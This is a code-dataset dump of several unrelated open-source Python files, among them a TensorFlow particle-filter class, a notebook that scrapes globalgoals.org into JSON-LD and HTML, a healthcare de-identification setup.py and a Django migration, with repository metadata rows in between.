log[c][dk][lk]['se'].append(np.std(loss_lists[lk], ddof=1) / np.sqrt(len(loss_lists[lk])))
# check whether the current model is better than all previous models
if 'val' in data_keys:
current_val_loss = log[c]['val'][stage['validation_loss']]['mean'][-1]
mean_loss_for_plot = np.append(mean_loss_for_plot,current_val_loss)
if current_val_loss < best_val_loss:
best_val_loss = current_val_loss
best_epoch = epoch
# save current model
saver.save(sess, save_path)
txt = 'epoch {:>3} >> '.format(epoch)
else:
txt = 'epoch {:>3} == '.format(epoch)
else:
best_epoch = epoch
saver.save(sess, save_path)
txt = 'epoch {:>3} >> '.format(epoch)
# after going through all data sets, do a print out of the current result
for lk in stage['monitor_losses']:
txt += '{}: '.format(lk)
for dk in data_keys:
if len(log[c][dk][lk]['mean']) > 0:
txt += '{:.2f}+-{:.2f}/'.format(log[c][dk][lk]['mean'][-1], log[c][dk][lk]['se'][-1])
txt = txt[:-1] + ' -- '
print(txt)
if plot:
stage['plot'](epoch)
epoch += 1
# after running out of patience, restore the model with lowest validation loss
saver.restore(sess, save_path)
return log
def predict(self, sess, batch, return_particles=False, **kwargs):
# define input dict, use the first state only if we do tracking
input_dict = {self.placeholders['o']: batch['o'],
self.placeholders['a']: batch['a'],
self.placeholders['num_particles']: 100}
if self.init_with_true_state:
input_dict[self.placeholders['s']] = batch['s'][:, :1]
if return_particles:
return sess.run([self.pred_states, self.particle_list, self.particle_probs_list], input_dict)
else:
return sess.run(self.pred_states, input_dict)
def connect_modules(self, means, stds, state_mins, state_maxs, state_step_sizes, learn_gaussian_mle=False):
# get shapes
self.batch_size = tf.shape(self.placeholders['o'])[0]
self.seq_len = tf.shape(self.placeholders['o'])[1]
# we use the static shape here because we need it to build the graph
self.action_dim = self.placeholders['a'].get_shape()[-1].value
encodings = snt.BatchApply(self.encoder)((self.placeholders['o'] - means['o']) / stds['o'])
# initialize particles
if self.init_with_true_state:
# tracking with known initial state
initial_particles = tf.tile(self.placeholders['s'][:, 0, tf.newaxis, :], [1, self.num_particles, 1])
else:
# global localization
if self.use_proposer:
# propose particles from observations
initial_particles = self.propose_particles(encodings[:, 0], self.num_particles, state_mins, state_maxs)
else:
# sample particles randomly
initial_particles = tf.concat(
[tf.random_uniform([self.batch_size, self.num_particles, 1], state_mins[d], state_maxs[d]) for d in
range(self.state_dim)], axis=-1, name='particles')
initial_particle_probs = tf.ones([self.batch_size, self.num_particles],
name='particle_probs') / self.num_particles_float
# assumes that samples has the correct size
def permute_batch(x, samples):
# get shapes
batch_size = tf.shape(x)[0]
num_particles = tf.shape(x)[1]
sample_size = tf.shape(samples)[1]
# compute 1D indices into the 2D array
idx = samples + num_particles * tf.tile(
tf.reshape(tf.range(batch_size), [batch_size, 1]),
[1, sample_size])
# index using the 1D indices and reshape again
result = tf.gather(tf.reshape(x, [batch_size * num_particles, -1]), idx)
result = tf.reshape(result, tf.shape(x[:,:sample_size]))
return result
def loop(particles, particle_probs, particle_list, particle_probs_list, additional_probs_list, i):
num_proposed_float = tf.round((self.propose_ratio ** tf.cast(i, tf.float32)) * self.num_particles_float)
num_proposed = tf.cast(num_proposed_float, tf.int32)
num_resampled_float = self.num_particles_float - num_proposed_float
num_resampled = tf.cast(num_resampled_float, tf.int32)
if self.propose_ratio < 1.0:
# resampling
basic_markers = tf.linspace(0.0, (num_resampled_float - 1.0) / num_resampled_float, num_resampled)
random_offset = tf.random_uniform([self.batch_size], 0.0, 1.0 / num_resampled_float)
markers = random_offset[:, None] + basic_markers[None, :] # shape: batch_size x num_resampled
cum_probs = tf.cumsum(particle_probs, axis=1)
marker_matching = markers[:, :, None] < cum_probs[:, None, :] # shape: batch_size x num_resampled x num_particles
samples = tf.cast(tf.argmax(tf.cast(marker_matching, 'int32'), dimension=2), 'int32')
standard_particles = permute_batch(particles, samples)
standard_particle_probs = tf.ones([self.batch_size, num_resampled])
standard_particles = tf.stop_gradient(standard_particles)
standard_particle_probs = tf.stop_gradient(standard_particle_probs)
# motion update
if learn_gaussian_mle:
standard_particles, _ = self.motion_update(self.placeholders['a'][:, i], standard_particles, means, stds, state_step_sizes, learn_gaussian_mle)
else:
standard_particles = self.motion_update(self.placeholders['a'][:, i], standard_particles, means, stds, state_step_sizes, learn_gaussian_mle)
# measurement update
standard_particle_probs *= self.measurement_update(encodings[:, i], standard_particles, means, stds)
if self.propose_ratio > 0.0:
# proposed particles
proposed_particles = self.propose_particles(encodings[:, i], num_proposed, state_mins, state_maxs)
proposed_particle_probs = tf.ones([self.batch_size, num_proposed])
# NORMALIZE AND COMBINE PARTICLES
if self.propose_ratio == 1.0:
particles = proposed_particles
particle_probs = proposed_particle_probs
elif self.propose_ratio == 0.0:
particles = standard_particles
particle_probs = standard_particle_probs
else:
standard_particle_probs *= (num_resampled_float / self.num_particles_float) / tf.reduce_sum(standard_particle_probs, axis=1, keep_dims=True)
proposed_particle_probs *= (num_proposed_float / self.num_particles_float) / tf.reduce_sum(proposed_particle_probs, axis=1, keep_dims=True)
particles = tf.concat([standard_particles, proposed_particles], axis=1)
particle_probs = tf.concat([standard_particle_probs, proposed_particle_probs], axis=1)
# NORMALIZE PROBABILITIES
particle_probs /= tf.reduce_sum(particle_probs, axis=1, keep_dims=True)
particle_list = tf.concat([particle_list, particles[:, tf.newaxis]], axis=1)
particle_probs_list = tf.concat([particle_probs_list, particle_probs[:, tf.newaxis]], axis=1)
return particles, particle_probs, particle_list, particle_probs_list, additional_probs_list, i + 1
# reshapes and sets the first shape sizes to None (which is necessary to keep the shape consistent in while loop)
particle_list = tf.reshape(initial_particles,
shape=[self.batch_size, -1, self.num_particles, self.state_dim])
particle_probs_list = tf.reshape(initial_particle_probs, shape=[self.batch_size, -1, self.num_particles])
additional_probs_list = tf.reshape(tf.ones([self.batch_size, self.num_particles, 4]), shape=[self.batch_size, -1, self.num_particles, 4])
# run the filtering process
particles, particle_probs, particle_list, particle_probs_list, additional_probs_list, i = tf.while_loop(
lambda *x: x[-1] < self.seq_len, loop,
[initial_particles, initial_particle_probs, particle_list, particle_probs_list, additional_probs_list,
tf.constant(1, dtype='int32')], name='loop')
# compute mean of particles
self.pred_states = self.particles_to_state(particle_list, particle_probs_list)
self.particle_list = particle_list
self.particle_probs_list = particle_probs_list
return particles, particle_probs, encodings, particle_list, particle_probs_list
def particles_to_state(self, particle_list, particle_probs_list):
mean_position = tf.reduce_sum(particle_probs_list[:, :, :, tf.newaxis] * particle_list[:, :, :, :2], axis=2)
mean_orientation = atan2(
tf.reduce_sum(particle_probs_list[:, :, :, tf.newaxis] * tf.cos(particle_list[:, :, :, 2:3]), axis=2),
tf.reduce_sum(particle_probs_list[:, :, :, tf.newaxis] * tf.sin(particle_list[:, :, :, 2:3]), axis=2))
mean_velocity = tf.reduce_sum(particle_probs_list[:, :, :, tf.newaxis] * particle_list[:, :, :, 3:5], axis=2)
return tf.concat([mean_position, mean_orientation, mean_velocity], axis=2)
def plot_motion_model(self, sess, batch, motion_samples, task, state_step_sizes):
# define the inputs and train/run the model
input_dict = {**{self.placeholders[key]: batch[key] for key in 'osa'},
**{self.placeholders['num_particles']: 100},
}
s_motion_samples = sess.run(motion_samples, input_dict)
plt.figure('Motion Model')
plt.gca().clear()
for i in range(min(len(s_motion_samples), 10)):
plt.scatter(s_motion_samples[i, :, 3] / state_step_sizes[3], s_motion_samples[i, :, 4] / state_step_sizes[4], color='blue', s=1)
plt.scatter(batch['s'][i, 0, 3] / state_step_sizes[3], batch['s'][i, 0, 4] / state_step_sizes[4], color='black', s=1)
plt.scatter(batch['s'][i, 1, 3] / state_step_sizes[3], batch['s'][i, 1, 4] / state_step_sizes[4], color='red', s=3)
plt.plot(batch['s'][i, :2, 3] / state_step_sizes[3], batch['s'][i, :2, 4] / state_step_sizes[4], color='black')
plt.xlim([0, 200])
plt.ylim([-50, 50])
plt.xlabel('translational vel')
plt.ylabel('angular vel')
plt.gca().set_aspect('equal')
plt.pause(0.01)
def plot_measurement_model(self, sess, batch_iterator, measurement_model_out):
batch = next(batch_iterator)
# define the inputs and train/run the model
input_dict = {**{self.placeholders[key]: batch[key] for key in 'osa'},
**{self.placeholders['num_particles']: 100},
}
s_measurement_model_out = sess.run([measurement_model_out], input_dict)
plt.figure('Measurement Model Output')
plt.gca().clear()
plt.imshow(s_measurement_model_out[0], interpolation="nearest", cmap="viridis_r", vmin=0.0, vmax=1.0)
plt.figure('Measurement Model Input')
plt.clf()
plt.scatter(batch['s'][:1, 0, 3], batch['s'][:1, 0, 4], marker='x', c=s_measurement_model_out[0][0,:1], vmin=0, vmax=1.0, cmap='viridis_r')
plt.scatter(batch['s'][1:, 0, 3], batch['s'][1:, 0, 4], marker='o', c=s_measurement_model_out[0][0,1:], vmin=0, vmax=1.0, cmap='viridis_r')
plt.xlabel('x_dot')
plt.ylabel('theta_dot')
plt.pause(0.01)
def plot_particle_proposer(self, sess, batch, proposed_particles, task):
# define the inputs and train/run the model
input_dict = {**{self.placeholders[key]: batch[key] for key in 'osa'},
**{self.placeholders['num_particles']: 100},
}
s_samples = sess.run(proposed_particles, input_dict)
plt.figure('Particle Proposer')
plt.gca().clear()
plot_maze(task)
for i in range(min(len(s_samples), 10)):
color = np.random.uniform(0.0, 1.0, 3)
plt.quiver(s_samples[i, :, 0], s_samples[i, :, 1], np.cos(s_samples[i, :, 2]), np.sin(s_samples[i, :, 2]), color=color, width=0.001, scale=100)
plt.quiver(batch['s'][i, 0, 0], batch['s'][i, 0, 1], np.cos(batch['s'][i, 0, 2]), np.sin(batch['s'][i, 0, 2]), color=color, scale=50, width=0.003)
plt.pause(0.01)
def plot_particle_filter(self, sess, batch, particle_list,
particle_probs_list, state_step_sizes, task):
s_states, s_particle_list, s_particle_probs_list, \
= sess.run([self.placeholders['s'], particle_list,
particle_probs_list], #self.noise_scaler1(1.0), self.noise_scaler2(2.0)],
{**{self.placeholders[key]: batch[key] for key in 'osa'},
**{self.placeholders['num_particles']: 20},
})
# print('learned motion noise factors {:.2f}/{:.2f}'.format(n1, n2))
num_steps = s_particle_list.shape[1]
for s in range(3):
plt.figure('particle_evolution, example {}'.format(s))
plt.clf()
for d in range(5):
plt.subplot(3, 2, [1, 3, 5, 2, 4][d])
for i in range(num_steps):
plt.scatter(i * np.ones_like(s_particle_list[s, i, :, d]),
s_particle_list[s, i, :, d] / (1 if s == 0 else state_step_sizes[d]),
c=s_particle_probs_list[s, i, :], cmap='viridis_r', marker='o', s=6, alpha=0.5,
linewidths=0.05,
vmin=0.0,
vmax=0.1)
current_state = batch['s'][s, i, d] / (1 if s == 0 else state_step_sizes[d])
plt.plot([i], [current_state], 'o', markerfacecolor='None', markeredgecolor='k',
markersize=2.5)
plt.xlabel('Time')
plt.ylabel('State {}'.format(d))
show_pause(pause=0.01)
| mit | 6,549,029,999,007,857,000 | 50.16409 | 255 | 0.560738 | false | 3.742303 | false | false | false |
westurner/pyglobalgoals | notebooks/globalgoals-pyglobalgoals.py.py | 1 | 16352 |
# coding: utf-8
# # @TheGlobalGoals for Sustainable Development
# ## Background
#
# * Homepage: **http://www.globalgoals.org/**
# - Twitter: https://twitter.com/TheGlobalGoals
# - Instagram: https://instagram.com/TheGlobalGoals/
# - Facebook: https://www.facebook.com/globalgoals.org
# - YouTube: https://www.youtube.com/channel/UCRfuAYy7MesZmgOi1Ezy0ng/
# - Hashtag: **#GlobalGoals**
# - https://twitter.com/hashtag/GlobalGoals
# - https://instagram.com/explore/tags/GlobalGoals/
# - https://www.facebook.com/hashtag/GlobalGoals
# - Hashtag: #TheGlobalGoals
# - https://twitter.com/hashtag/TheGlobalGoals
# - https://instagram.com/explore/tags/TheGlobalGoals/
# - https://www.facebook.com/hashtag/TheGlobalGoals
#
#
# ### pyglobalgoals
#
# * Homepage: https://github.com/westurner/pyglobalgoals
# * Src: https://github.com/westurner/pyglobalgoals
# * Download: https://github.com/westurner/pyglobalgoals/releases
#
# ### Objectives
#
# * [x] ENH: Read and parse TheGlobalGoals from globalgoals.org
# * [x] ENH: Download (HTTP GET) each GlobalGoal tile image to ``./notebooks/data/images/``
# * [-] ENH: Generate e.g. tweets for each GlobalGoal (e.g. **##gg17** / **##GG17**)
# * [x] ENH: Save TheGlobalGoals to a JSON-LD document
# * [-] ENH: Save TheGlobalGoals with Schema.org RDF vocabulary (as JSON-LD)
# * [-] ENH: Save TheGlobalGoals as ReStructuredText with headings and images
# * [-] ENH: Save TheGlobalGoals as Markdown with headings and images
# * [-] ENH: Save TheGlobalGoals as RDFa with headings and images
# * [ ] ENH: Save TheGlobalGoals as RDFa with images like http://globalgoals.org/
# * [-] DOC: Add narrative documentation where necessary
# * [-] REF: Refactor and extract methods from ``./notebooks/`` to ``./pyglobalgoals/``
#
# ## Implementation
#
# * Python package: [**pyglobalgoals**](#pyglobalgoals)
#
# * Jupyter notebook: **``./notebooks/globalgoals-pyglobalgoals.py.ipynb``**
# * Src: https://github.com/westurner/pyglobalgoals/blob/master/notebooks/globalgoals-pyglobalgoals.py.ipynb
# * Src: https://github.com/westurner/pyglobalgoals/blob/master/notebooks/globalgoals-pyglobalgoals.py.py
# * Src: https://github.com/westurner/pyglobalgoals/blob/develop/notebooks/globalgoals-pyglobalgoals.py.ipynb
# * Src: https://github.com/westurner/pyglobalgoals/blob/v0.1.2/notebooks/globalgoals-pyglobalgoals.py.ipynb
# * Src: https://github.com/westurner/pyglobalgoals/blob/v0.2.1/notebooks/globalgoals-pyglobalgoals.py.ipynb
#
# * [x] Download HTML with requests
# * [x] Parse HTML with beautifulsoup
# * [x] Generate JSON[-LD] with ``collections.OrderedDict``
# * [-] REF: Functional methods -> more formal type model -> ``pyglobalgoals.<...>``
#
#
# * [JSON-LD](#JSONLD) document: **``./notebooks/data/globalgoals.jsonld``**
# * Src: https://github.com/westurner/pyglobalgoals/blob/master/notebooks/data/globalgoals.jsonld
#
#
# ### JSON-LD
#
# * Wikipedia: https://en.wikipedia.org/wiki/JSON-LD
# * Homepage: http://json-ld.org/
# * Docs: http://json-ld.org/playground/
# * Hashtag: #JSONLD
#
# ### RDFa
#
# * Wikipedia: https://en.wikipedia.org/wiki/RDFa
# * Standard: http://www.w3.org/TR/rdfa-core/
# * Docs: http://www.w3.org/TR/rdfa-primer/
# * Hashtag: #RDFa
# In[1]:
#!conda install -y beautiful-soup docutils jinja2 requests
get_ipython().system(u"pip install -U beautifulsoup4 jinja2 'requests<2.8' requests-cache version-information # tweepy")
import bs4
import jinja2
import requests
import requests_cache
requests_cache.install_cache('pyglobalgoals_cache')
#!pip install -U version_information
get_ipython().magic(u'load_ext version_information')
get_ipython().magic(u'version_information jupyter, bs4, jinja2, requests, requests_cache, version_information')
# In[2]:
url = "http://www.globalgoals.org/"
req = requests.get(url)
#print(req)
#print(sorted(dir(req)))
#req.<TAB>
#req??<[Ctrl-]Enter>
if not req.ok:
raise Exception(req)
content = req.content
print(content[:20])
# In[ ]:
# In[3]:
bs = bs4.BeautifulSoup(req.content)
print(bs.prettify())
# In[4]:
tiles = bs.find_all(class_='goal-tile-wrapper')
pp(tiles)
# In[5]:
tile = tiles[0]
print(tile)
# In[6]:
link = tile.findNext('a')
img = link.findNext('img')
img_title = img['alt'][:-5]
img_src = img['src']
link_href = link['href']
example = {'name': img_title, 'img_src': img_src, 'href': link_href}
print(example)
# In[7]:
import collections
def get_data_from_goal_tile_wrapper_div(node, n=None):
link = node.findNext('a')
img = link.findNext('img')
img_title = img['alt'][:-5]
img_src = img['src']
link_href = link['href']
output = collections.OrderedDict({'@type': 'un:GlobalGoal'})
if n:
output['n'] = n
output['name'] = img_title
output['image'] = img_src
output['url'] = link_href
return output
def get_goal_tile_data(bs):
for i, tile in enumerate(bs.find_all(class_='goal-tile-wrapper'), 1):
yield get_data_from_goal_tile_wrapper_div(tile, n=i)
tiles = list(get_goal_tile_data(bs))
import json
print(json.dumps(tiles, indent=2))
goal_tiles = tiles[:-1]
# In[ ]:
# In[8]:
import codecs
from path import Path
def build_default_context():
context = collections.OrderedDict()
# context["dc"] = "http://purl.org/dc/elements/1.1/"
context["schema"] = "http://schema.org/"
# context["xsd"] = "http://www.w3.org/2001/XMLSchema#"
# context["ex"] = "http://example.org/vocab#"
# context["ex:contains"] = {
# "@type": "@id"
# }
# default attrs (alternative: prefix each with schema:)
# schema.org/Thing == schema:Thing (!= schema:thing)
context["name"] = "http://schema.org/name"
context["image"] = {
"@type": "@id",
"@id": "http://schema.org/image"
}
context["url"] = {
"@type": "@id",
"@id":"http://schema.org/url"
}
context["description"] = {
"@type": "http://schema.org/Text",
"@id": "http://schema.org/description"
}
return context
DEFAULT_CONTEXT = build_default_context()
def goal_tiles_to_jsonld(nodes, context=None, default_context=DEFAULT_CONTEXT):
data = collections.OrderedDict()
if context is None and default_context is not None:
data['@context'] = build_default_context()
elif context:
data['@context'] = context
elif default_context:
data['@context'] = default_context
data['@graph'] = nodes
return data
DATA_DIR = Path('.') / 'data'
#DATA_DIR = Path(__file__).dirname
#DATA_DIR = determine_path_to(current_notebook) # PWD initially defaults to nb.CWD
DATA_DIR.makedirs_p()
GLOBAL_GOALS_JSONLD_PATH = DATA_DIR / 'globalgoals.jsonld'
def write_global_goals_jsonld(goal_tiles, path=GLOBAL_GOALS_JSONLD_PATH):
goal_tiles_jsonld = goal_tiles_to_jsonld(goal_tiles)
with codecs.open(path, 'w', 'utf8') as fileobj:
json.dump(goal_tiles_jsonld, fileobj, indent=2)
def read_global_goals_jsonld(path=GLOBAL_GOALS_JSONLD_PATH, prettyprint=True):
with codecs.open(path, 'r', 'utf8') as fileobj:
global_goals_dict = json.load(fileobj,
object_pairs_hook=collections.OrderedDict)
return global_goals_dict
def print_json_dumps(global_goals_dict, indent=2):
print(json.dumps(global_goals_dict, indent=indent))
write_global_goals_jsonld(goal_tiles)
global_goals_dict = read_global_goals_jsonld(path=GLOBAL_GOALS_JSONLD_PATH)
assert global_goals_dict == goal_tiles_to_jsonld(goal_tiles)
print_json_dumps(global_goals_dict)
# In[9]:
def build_tweet_for_goal_tile(node):
return '##gg{n} {name} {url} {image} @TheGlobalGoals #GlobalGoals'.format(**node)
tweets = list(build_tweet_for_goal_tile(tile) for tile in goal_tiles)
tweets
# In[10]:
for node in goal_tiles:
img_basename = node['image'].split('/')[-1]
node['image_basename'] = img_basename
node['tweet_txt'] = build_tweet_for_goal_tile(node)
print(json.dumps(goal_tiles, indent=2))
# In[11]:
#!conda install -y pycurl
try:
import pycurl
except ImportError as e:
import warnings
warnings.warn(unicode(e))
def pycurl_download_file(url, dest_path, follow_redirects=True):
with open(dest_path, 'wb') as f:
c = pycurl.Curl()
c.setopt(c.URL, url)
c.setopt(c.WRITEDATA, f)
if follow_redirects:
c.setopt(c.FOLLOWLOCATION, True)
c.perform()
c.close()
return (url, dest_path)
# In[12]:
import requests
def requests_download_file(url, dest_path, **kwargs):
local_filename = url.split('/')[-1]
# NOTE the stream=True parameter
r = requests.get(url, stream=True)
with open(dest_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.flush()
return (url, dest_path)
# In[13]:
import urllib
def urllib_urlretrieve_download_file(url, dest_path):
"""
* https://docs.python.org/2/library/urllib.html#urllib.urlretrieve
"""
(filename, headers) = urlllib.urlretrieve(url, dest_path)
return (url, filename)
# In[14]:
def deduplicate_on_attr(nodes, attr='image_basename'):
attrindex = collections.OrderedDict()
for node in nodes:
attrindex.setdefault(node[attr], [])
attrindex[node[attr]].append(node)
return attrindex
def check_for_key_collisions(dict_of_lists):
for name, _nodes in dict_of_lists.items():
if len(_nodes) > 1:
raise Exception(('duplicate filenames:')
(name, nodes))
attrindex = deduplicate_on_attr(goal_tiles, attr='image_basename')
check_for_key_collisions(attrindex)
#
IMG_DIR = DATA_DIR / 'images'
IMG_DIR.makedirs_p()
def download_goal_tile_images(nodes, img_path):
for node in nodes:
dest_path = img_path / node['image_basename']
source_url = node['image']
(url, dest) = requests_download_file(source_url, dest_path)
node['image_path'] = dest
print((node['n'], node['name']))
print((node['image_path']))
# time.sleep(1) # see: requests_cache
download_goal_tile_images(goal_tiles, IMG_DIR)
tiles_jsonld = goal_tiles_to_jsonld(goal_tiles)
print(json.dumps(tiles_jsonld, indent=2))
# In[15]:
#import jupyter.display as display
import IPython.display as display
display.Image(goal_tiles[0]['image_path'])
# In[16]:
import IPython.display
for tile in goal_tiles:
x = IPython.display.Image(tile['image_path'])
x
# In[17]:
import IPython.display
def display_goal_images():
for tile in goal_tiles:
yield IPython.display.Image(tile['image_path'])
x = list(display_goal_images())
#pp(x)
IPython.display.display(*x)
# In[18]:
import string
print(string.punctuation)
NOT_URI_CHARS = dict.fromkeys(string.punctuation + string.digits)
NOT_URI_CHARS.pop('-')
NOT_URI_CHARS.pop('_')
def _slugify(txt):
"""an ~approximate slugify function for human-readable URI #fragments"""
txt = txt.strip().lower()
chars = (
(c if c != ' ' else '-') for c in txt if
c not in NOT_URI_CHARS)
return u''.join(chars)
def _slugify_single_dash(txt):
"""
* unlike docutils, this function does not strip stopwords like 'and' and 'or'
TODO: locate this method in docutils
"""
def _one_dash_only(txt):
count = 0
for char in txt:
if char == '-':
count += 1
else:
if count:
yield '-'
yield char
count = 0
return u''.join(_one_dash_only(_slugify(txt)))
for node in goal_tiles:
node['name_numbered'] = "%d. %s" % (node['n'], node['name'])
node['slug_rst'] = _slugify_single_dash(node['name'])
node['slug_md'] = _slugify_single_dash(node['name'])
print_json_dumps(goal_tiles)
# In[19]:
import IPython.display
def display_goal_images():
for tile in goal_tiles:
yield IPython.display.Markdown("## %s" % tile['name_numbered'])
yield IPython.display.Image(tile['image_path'])
yield IPython.display.Markdown(tile['tweet_txt'].replace('##', '\##'))
x = list(display_goal_images())
#pp(x)
IPython.display.display(*x)
# In[20]:
TMPL_RST = """
The Global Goals
******************
.. contents::
{% for node in nodes %}
{{ node['name_numbered'] }}
======================================================
| {{ node['url'] }}
.. image:: {{ node['image'] }}{# node['image_path'] #}
:target: {{ node['url'] }}
:alt: {{ node['name'] }}
..
{{ node['tweet_txt'] }}
{% endfor %}
"""
tmpl_rst = jinja2.Template(TMPL_RST)
output_rst = tmpl_rst.render(nodes=goal_tiles)
print(output_rst)
# In[21]:
output_rst_path = DATA_DIR / 'globalgoals.rst'
with codecs.open(output_rst_path, 'w', encoding='utf-8') as f:
f.write(output_rst)
print("# wrote goals to %r" % output_rst_path)
# In[22]:
import docutils.core
output_rst_html = docutils.core.publish_string(output_rst, writer_name='html')
print(bs4.BeautifulSoup(output_rst_html).find(id='the-global-goals'))
# In[23]:
IPython.display.HTML(output_rst_html)
# In[24]:
TMPL_MD = """
# The Global Goals
**Contents:**
{% for node in nodes %}
* [{{ node['name_numbered'] }}](#{{ node['slug_md'] }})
{%- endfor %}
{% for node in nodes %}
## {{ node['name_numbered'] }}
{{ node['url'] }}
[![{{node['name_numbered']}}]({{ node['image'] }})]({{ node['url'] }})
> {{ node['tweet_txt'] }}
{% endfor %}
"""
tmpl_md = jinja2.Template(TMPL_MD)
output_markdown = tmpl_md.render(nodes=goal_tiles)
print(output_markdown)
# In[25]:
output_md_path = DATA_DIR / 'globalgoals.md'
with codecs.open(output_md_path, 'w', encoding='utf-8') as f:
f.write(output_markdown)
print("# wrote goals to %r" % output_md_path)
# In[26]:
IPython.display.Markdown(output_markdown)
# In[27]:
context = dict(nodes=goal_tiles)
# In[28]:
TMPL_HTML = """
<h1>The Global Goals</h1>
<h2>Contents:</h2>
{% for node in nodes %}
<li><a href="#{{node.slug_md}}">{{node.name_numbered}}</a></li>
{%- endfor %}
{% for node in nodes %}
<div class="goal-tile">
<h2><a name="#{{node.slug_md}}">{{ node.name_numbered }}</a></h2>
<a href="{{node.url}}">{{node.url}} </a>
<a href="{{node.url}}">
<img src="{{node.image}}" alt="{{node.name_numbered}}"/>{{node.url}} </a>
<div style="margin-left: 12px">
{{ node.tweet_txt }}
</div>
</div>
{% endfor %}
"""
tmpl_html = jinja2.Template(TMPL_HTML)
output_html = tmpl_html.render(**context)
print(output_html)
# In[29]:
output_html_path = DATA_DIR / 'globalgoals.html'
with codecs.open(output_html_path, 'w', encoding='utf-8') as f:
f.write(output_html)
print("# wrote goals to %r" % output_html_path)
# In[30]:
IPython.display.HTML(output_html)
# In[31]:
import jinja2
# TODO: prefix un:
TMPL_RDFA_HTML5 = ("""
<div prefix="schema: http://schema.org/
un: http://schema.un.org/#">
<h1>The Global Goals</h1>
<h2>Contents:</h2>
{%- for node in nodes %}
<li><a href="#{{node.slug_md}}">{{node.name_numbered}}</a></li>
{%- endfor %}
{% for node in nodes %}
<div class="goal-tile" resource="{{node.url}}" typeof="un:GlobalGoal">
<div style="display:none">
<meta property="schema:name">{{node.name}}</meta>
<meta property="schema:image">{{node.image}}</meta>
<meta property="#n">{{node.n}}</meta>
</div>
<h2><a name="#{{node.slug_md}}">{{ node.name_numbered }}</a></h2>
<a property="schema:url" href="{{node.url}}">{{node.url}} </a>
<a href="{{node.url}}">
<img src="{{node.image}}" alt="{{node.name_numbered}}"/>{{node.url}} </a>
<div style="margin-left: 12px">
{{ node.tweet_txt }}
</div>
</div>
{% endfor %}
</div>
"""
)
tmpl_rdfa_html5 = jinja2.Template(TMPL_RDFA_HTML5)
output_rdfa_html5 = tmpl_rdfa_html5.render(**context)
print(output_rdfa_html5)
# In[32]:
output_rdfa_html5_path = DATA_DIR / 'globalgoals.rdfa.html5.html'
with codecs.open(output_rdfa_html5_path, 'w', encoding='utf-8') as f:
f.write(output_rdfa_html5_path)
print("# wrote goals to %r" % output_rdfa_html5_path)
# In[33]:
IPython.display.HTML(output_rdfa_html5)
# In[34]:
# tmpl_html
# tmpl_rdfa_html5
import difflib
for line in difflib.unified_diff(
TMPL_HTML.splitlines(),
TMPL_RDFA_HTML5.splitlines()):
print(line)
| bsd-3-clause | -4,042,131,204,744,934,400 | 24.630094 | 120 | 0.635763 | false | 2.940478 | false | false | false |
GoogleCloudPlatform/healthcare-deid | setup.py | 1 | 1364 | """Setup module for the healthcare_deid DLP pipeline.
All of the code necessary to run the pipeline is packaged into a source
distribution that is uploaded to the --staging_location specified on the command
line. The source distribution is then installed on the workers before they
start running.
When remotely executing the pipeline, `--setup_file path/to/setup.py` must be
added to the pipeline's command line.
"""
import os
import setuptools
# Add required python packages that should be installed over and above the
# standard DataFlow worker environment. Version restrictions are supported if
# necessary.
REQUIRED_PACKAGES = [
'apache_beam[gcp]',
'google-api-python-client',
'google-cloud-storage',
'six==1.10.0',
]
packages = ['common', 'dlp', 'physionet']
package_dir = {p: p for p in packages}
# Use eval from bazel-bin so we get the generated results_pb2.py file.
# If it doesn't exist, then the job is another pipeline that doesn't need eval.
eval_bazel_path = 'bazel-bin/eval/run_pipeline.runfiles/__main__/eval'
if os.path.exists(eval_bazel_path):
packages.append('eval')
package_dir['eval'] = eval_bazel_path
setuptools.setup(
name='healthcare_deid',
version='0.0.1',
package_dir=package_dir,
description='Healthcare Deid pipeline package.',
install_requires=REQUIRED_PACKAGES,
packages=packages)
| apache-2.0 | 6,858,331,243,784,327,000 | 32.268293 | 80 | 0.737537 | false | 3.598945 | false | false | false |
SethGreylyn/gwells | gwells/migrations/0009_auto_20170711_1600_squashed_0010_auto_20170713_0917.py | 1 | 20389 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-07-13 17:57
from __future__ import unicode_literals
from decimal import Decimal
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
replaces = [('gwells', '0009_auto_20170711_1600'), ('gwells', '0010_auto_20170713_0917')]
dependencies = [
('gwells', '0008_auto_20170707_1158'),
]
operations = [
migrations.RemoveField(
model_name='activitysubmission',
name='created',
),
migrations.RemoveField(
model_name='activitysubmission',
name='modified',
),
migrations.RemoveField(
model_name='ltsaowner',
name='created',
),
migrations.RemoveField(
model_name='ltsaowner',
name='modified',
),
migrations.RemoveField(
model_name='well',
name='created',
),
migrations.RemoveField(
model_name='well',
name='modified',
),
migrations.AddField(
model_name='activitysubmission',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='activitysubmission',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='activitysubmission',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='activitysubmission',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='bedrockmaterial',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='bedrockmaterial',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='bedrockmaterial',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='bedrockmaterial',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='bedrockmaterialdescriptor',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='bedrockmaterialdescriptor',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='bedrockmaterialdescriptor',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='bedrockmaterialdescriptor',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='driller',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='driller',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='driller',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='driller',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
